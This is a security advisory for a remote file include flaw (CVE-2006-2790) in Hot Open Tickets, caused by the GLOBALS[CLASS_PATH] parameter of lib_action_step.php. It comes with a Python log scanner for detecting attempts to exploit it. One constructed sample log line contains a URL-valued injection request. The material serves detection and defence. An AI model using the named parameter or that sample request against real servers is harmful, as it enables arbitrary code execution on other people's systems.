Vendor: Hot Open Tickets
By: Kacper (Rahim)
CVSS: 7.5 HIGH
Remote File Include
CWE: 94
Product Name: Hot Open Tickets
Affected Version From: Hot Open Tickets (hot_11012004_ver2f)
Affected Version To: Hot Open Tickets (hot_11012004_ver2f)
Patch Exists: YES
Related CVE: CVE-2006-2790
CPE: a:hotopentickets:hot_open_tickets
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006
Hot Open Tickets (hot_11012004_ver2f) – Remote File Include Vulnerabilities
This vulnerability allows remote attackers to execute arbitrary PHP code on the vulnerable server. It is caused by the "lib_action_step.php" script not properly sanitizing user input supplied to the "GLOBALS[CLASS_PATH]" variable, which can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code.
Mitigation: No known mitigation
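Detection: requests that set the "GLOBALS[CLASS_PATH]" parameter on "lib_action_step.php" can be found in web-server access logs. The script below is an added example, not part of the original advisory. It assumes combined-format access logs; the sample lines, the `/hot/` install path and the host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

SCRIPT = "lib_action_step.php"   # script named in the advisory
PARAM = "GLOBALS[CLASS_PATH]"    # request parameter named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_VALUE_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def classify(log_line):
    """Classify one access-log line.

    Returns 'remote-include' when the parameter carries a URL-style value,
    'param-override' when it is set to anything else, and None otherwise.
    """
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    path, _, query = match.group(1).partition("?")
    if SCRIPT not in unquote(path).lower():
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B/%5D forms match too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if URL_VALUE_RE.match(value.strip()):
            return "remote-include"
        verdict = "param-override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses, hypothetical /hot/ path).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2006:10:00:00 +0000] "GET /hot/index.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jun/2006:10:00:02 +0000] "GET /hot/lib_action_step.php?GLOBALS%5BCLASS_PATH%5D=http%3A%2F%2Fhost.invalid%2F HTTP/1.1" 200 0',
    '198.51.100.9 - - [01/Jun/2006:10:01:00 +0000] "GET /hot/lib_action_step.php?GLOBALS[CLASS_PATH]=./classes/ HTTP/1.0" 200 10',
    '198.51.100.9 - - [01/Jun/2006:10:02:00 +0000] "GET /hot/lib_action_step.php?step=2 HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Parameters sent in a POST body do not appear in access logs, so this check only covers values passed in the query string.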